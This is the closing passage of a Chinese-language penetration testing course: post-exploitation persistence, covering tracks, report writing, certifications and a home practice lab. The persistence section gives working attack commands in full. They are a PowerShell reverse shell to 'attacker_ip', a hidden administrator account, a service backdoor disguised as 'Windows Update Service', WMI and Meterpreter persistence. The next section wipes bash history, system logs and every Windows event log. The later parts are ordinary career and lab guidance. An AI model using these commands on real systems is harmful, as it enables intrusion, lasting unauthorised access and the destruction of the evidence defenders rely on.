25. # 使用kill命令连接后门
26. kill -64 0

复制代码

2. # 添加管理员用户
3. net user hacker Password123 /add
4. net localgroup administrators hacker /add
6. # 创建反向shell
7. # 使用PowerShell
8. powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
10. # 使用Meterpreter持久化
11. # 在Meterpreter会话中运行
12. run persistence -U -i 5 -p 4444 -r attacker_ip
14. # 创建服务后门
15. sc create backdoor binpath= "cmd.exe /c C:\backdoor.bat" start= auto DisplayName= "Windows Update Service"
16. sc start backdoor
18. # 使用WMI事件订阅进行持久化
19. # 使用PowerShell
20. $FilterArgs = @{
21.     QueryLanguage = 'WQL'
22.     Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfProc_Process' AND TargetInstance.Name = 'svchost.exe'"
23. }
24. $Filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
26. $ConsumerArgs = @{
27.     CommandLineTemplate = "C:\backdoor.bat"
28. }
29. $Consumer = New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
31. $BindingArgs = @{
32.     Filter = $Filter
33.     Consumer = $Consumer
34. }
35. $Binding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $BindingArgs

复制代码

6.3 清除痕迹

清除痕迹是指删除或修改日志文件和其他证据，以避免被发现。

2. # 清除bash历史
3. history -c
4. history -w
5. unset HISTFILE
6. export HISTSIZE=0
7. export HISTFILESIZE=0
9. # 清除日志文件
10. echo > /var/log/auth.log
11. echo > /var/log/syslog
12. echo > /var/log/kern.log
13. echo > /var/log/lastlog
15. # 修改文件时间戳
16. touch -r reference_file target_file
18. # 使用日志清除工具
19. # 安装和使用zapret
20. git clone https://github.com/mthbernardes/zapret.git
21. cd zapret
22. python zapret.py --clear --all
24. # 使用log-wiper
25. git clone https://github.com/ChrisTheCoolHut/Zer0w0rm-Log-Wiper.git
26. cd Zer0w0rm-Log-Wiper
27. gcc logwiper.c -o logwiper
28. ./logwiper

复制代码

2. # 清除PowerShell历史
3. Remove-Item (Get-PSReadlineOption).HistorySavePath
5. # 清除事件日志
6. wevtutil el | Foreach-Object {wevtutil cl "$_"}
8. # 清除特定事件日志
9. wevtutil cl System
10. wevtutil cl Security
11. wevtutil cl Application
13. # 使用Metasploit清除事件日志
14. # 在Meterpreter会话中运行
15. clearev
17. # 使用痕迹清除工具
18. # 使用SDelete
19. https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
20. sdelete -q c:\path\to\file
22. # 使用CCleaner
23. # 下载并安装CCleaner，运行清理

复制代码

6.4 报告编写

渗透测试报告是渗透测试过程的最终产出，它详细记录了测试过程、发现的漏洞、利用方法和建议的修复措施。

一份完整的渗透测试报告通常包括以下部分：

1. 执行摘要：简要概述测试范围、方法、主要发现和建议。
2. 测试范围：明确说明测试的系统、网络和应用程序范围。
3. 测试方法：描述使用的测试方法、工具和技术。
4. 漏洞详情：详细描述每个发现的漏洞，包括：漏洞描述风险等级受影响的系统证明概念修复建议
5. 漏洞描述
6. 风险等级
7. 受影响的系统
8. 证明概念
9. 修复建议
10. 附录：包括技术细节、工具输出、截图等补充信息。

• 漏洞描述
• 风险等级
• 受影响的系统
• 证明概念
• 修复建议

2. # 使用Dradis框架生成报告
3. # 安装Dradis
4. wget https://github.com/dradis/dradis-ce/releases/download/v4.0.0/dradis-ce_4.0.0-1_amd64.deb
5. sudo dpkg -i dradis-ce_4.0.0-1_amd64.deb
7. # 启动Dradis服务
8. sudo systemctl start dradis
10. # 访问Dradis Web界面
11. # 打开浏览器，访问 http://localhost:3000
12. # 按照向导完成初始设置
14. # 使用Dradis导入和整理数据
15. # 创建项目，添加问题，附加证据，生成报告
17. # 使用LaTeX生成专业报告
18. # 安装LaTeX
19. sudo apt install texlive-full
21. # 创建LaTeX文档模板
22. \documentclass{article}
23. \usepackage{graphicx}
24. \usepackage{hyperref}
25. \usepackage{listings}
26. \usepackage{xcolor}
28. \title{渗透测试报告}
29. \author{渗透测试团队}
30. \date{\today}
32. \begin{document}
33. \maketitle
34. \tableofcontents
36. \section{执行摘要}
37. 在此处添加执行摘要...
39. \section{测试范围}
40. 在此处添加测试范围...
42. \section{测试方法}
43. 在此处添加测试方法...
45. \section{漏洞详情}
46. 在此处添加漏洞详情...
48. \subsection{漏洞1：SQL注入}
49. 在此处添加漏洞描述...
51. \subsection{漏洞2：跨站脚本}
52. 在此处添加漏洞描述...
54. \section{附录}
55. 在此处添加附录...
57. \end{document}
59. # 编译LaTeX文档
60. pdflatex penetration_test_report.tex

复制代码

• 清晰简洁：使用清晰的语言和结构，避免技术术语过多。
• 证据支持：为每个发现的漏洞提供证据，如截图、命令输出或代码片段。
• 风险评级：使用一致的标准（如CVSS）对漏洞进行风险评级。
• 实用建议：提供具体、可行的修复建议。
• 专业格式：使用专业格式和模板，确保报告易于阅读和理解。

第七部分：专业发展和认证

成为专业的渗透测试工程师不仅需要技术技能，还需要专业认证和持续学习。

7.1 职业路径

渗透测试工程师的职业路径通常包括以下阶段：

1. 初级渗透测试工程师：执行基本的渗透测试任务，如漏洞扫描和信息收集。
2. 中级渗透测试工程师：执行复杂的渗透测试，包括Web应用、网络和社交工程学测试。
3. 高级渗透测试工程师：领导渗透测试团队，设计测试方法，处理复杂的安全挑战。
4. 渗透测试经理/顾问：管理渗透测试项目，与客户沟通，提供安全咨询。
5. 安全架构师/CTO：设计安全架构，制定安全策略，领导安全团队。

7.2 认证准备

• CompTIA Security+：基础安全知识认证。
• CompTIA PenTest+：入门级渗透测试认证。
• eJPT（eLearnSecurity Junior Penetration Tester）：实践性入门渗透测试认证。

• OSCP（Offensive Security Certified Professional）：实践性渗透测试认证，被广泛认为是行业标准。
• CEH（Certified Ethical Hacker）：道德黑客认证，涵盖广泛的黑客技术和工具。
• GWAPT（GIAC Web Application Penetration Tester）：专注于Web应用渗透测试的认证。

• OSEP（Offensive Security Experienced Penetration Tester）：高级渗透测试认证，专注于绕过安全防御。
• OSWE（Offensive Security Web Expert）：高级Web应用渗透测试认证。
• CISSP（Certified Information Systems Security Professional）：信息安全管理的黄金标准认证。

2. # 设置OSCP练习环境
3. # 下载和设置Hack The Box
4. # 注册：https://www.hackthebox.eu/
5. # 下载VPN配置文件并连接
7. # 下载和设置TryHackMe
8. # 注册：https://tryhackme.com/
9. # 加入房间和路径
11. # 下载和设置VulnHub
12. # 访问：https://www.vulnhub.com/
13. # 下载虚拟机并设置
15. # 使用Parrot OS进行OSCP准备
16. # 安装常用工具
17. sudo apt install nmap metasploit-framework sqlmap nikto dirb gobuster burpsuite wpscan joomscan
19. # 创建练习脚本
20. # 创建端口扫描脚本
21. cat > port_scan.sh << 'EOF'
22. #!/bin/bash
23. target=$1
24. echo "Scanning $target..."
25. nmap -sC -sV -oA nmap_scan $target
26. echo "Scan complete. Results saved to nmap_scan.*"
27. EOF
28. chmod +x port_scan.sh
30. # 创建Web枚举脚本
31. cat > web_enum.sh << 'EOF'
32. #!/bin/bash
33. target=$1
34. echo "Enumerating web services on $target..."
35. nikto -h $target -output nikto_scan.txt
36. dirb http://$target -o dirb_scan.txt
37. gobuster dir -u http://$target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_scan.txt
38. echo "Enumeration complete. Results saved to *_scan.txt"
39. EOF
40. chmod +x web_enum.sh

复制代码

7.3 持续学习

网络安全领域不断发展，持续学习至关重要。

• 博客和新闻网站：Krebs on Security、The Hacker News、Dark Reading
• YouTube频道：Hak5、Null Byte、John Hammond
• 在线课程平台：Udemy、Coursera、Pluralsight
• CTF平台：Hack The Box、TryHackMe、OverTheWire

• Reddit：r/netsec、r/AskNetsec、r/HowToHack
• Discord/Slack：各种安全社区的聊天服务器
• 本地会议：BSides、DEF CON、Black Hat
• 开源项目：为安全工具贡献代码或报告漏洞

2. # 设置家庭实验室
3. # 安装VirtualBox
4. sudo apt install virtualbox
6. # 下载和设置Metasploitable2（易受攻击的Linux系统）
7. wget https://sourceforge.net/projects/metasploitable/files/Metasploitable2/metasploitable-linux-2.0.0.zip
8. unzip metasploitable-linux-2.0.0.zip
9. VBoxManage import Metasploitable2.ova
11. # 下载和设置OWASP Broken Web Apps（BWA）项目
12. wget https://sourceforge.net/projects/owaspbwa/files/OWASP_Broken_Web_Apps_VM_1.2/OWASP_Broken_Web_Apps.ova
13. VBoxManage import OWASP_Broken_Web_Apps.ova
15. # 创建自动化练习脚本
16. cat > auto_practice.sh << 'EOF'
17. #!/bin/bash
18. # 启动虚拟机
19. VBoxManage startvm "Metasploitable2" --type headless
20. VBoxManage startvm "OWASP Broken Web Apps" --type headless
22. # 等待虚拟机启动
23. sleep 60
25. # 获取虚拟机IP
26. metasploitable_ip=$(VBoxManage guestproperty get "Metasploitable2" "/VirtualBox/GuestInfo/Net/0/V4/IP" | awk '{print $2}')
27. bwa_ip=$(VBoxManage guestproperty get "OWASP Broken Web Apps" "/VirtualBox/GuestInfo/Net/0/V4/IP" | awk '{print $2}')
29. echo "Metasploitable2 IP: $metasploitable_ip"
30. echo "OWASP BWA IP: $bwa_ip"
32. # 创建练习目录
33. mkdir -p practice/$(date +%Y%m%d)
34. cd practice/$(date +%Y%m%d)
36. # 执行自动扫描
37. ./port_scan.sh $metasploitable_ip
38. ./port_scan.sh $bwa_ip
40. ./web_enum.sh $metasploitable_ip
41. ./web_enum.sh $bwa_ip
43. echo "Practice session complete. Results saved in practice/$(date +%Y%m%d)/"
44. EOF
45. chmod +x auto_practice.sh

复制代码

结论：总结和下一步行动

本课程提供了一个从零基础到专业渗透测试工程师的完整学习路径。通过学习Parrot OS的使用、网络安全基础、信息收集、漏洞评估、渗透测试、后渗透技术和报告编写，你已经掌握了成为网络安全专家所需的核心技能。

下一步行动建议

1. 实践练习：持续在Hack The Box、TryHackMe和VulnHub等平台上练习。
2. 获取认证：从入门级认证开始，逐步挑战更高级的认证。
3. 参与社区：加入安全社区，与其他专业人士交流和学习。
4. 建立项目组合：记录你的渗透测试项目和研究成果，建立个人品牌。
5. 寻找实习或入门工作：应用你的技能，在真实环境中获得经验。

持续发展

网络安全是一个不断发展的领域，新技术和威胁不断出现。作为安全专业人士，你需要：

• 保持好奇心和学习的热情
• 跟踪最新的安全趋势和威胁
• 不断更新你的技能和知识
• 参与安全研究和开发
• 分享你的知识和经验，帮助他人成长

通过遵循本课程提供的学习路径和持续发展建议，你将能够成为一名专业的渗透测试工程师和网络安全专家，为保护数字世界做出贡献。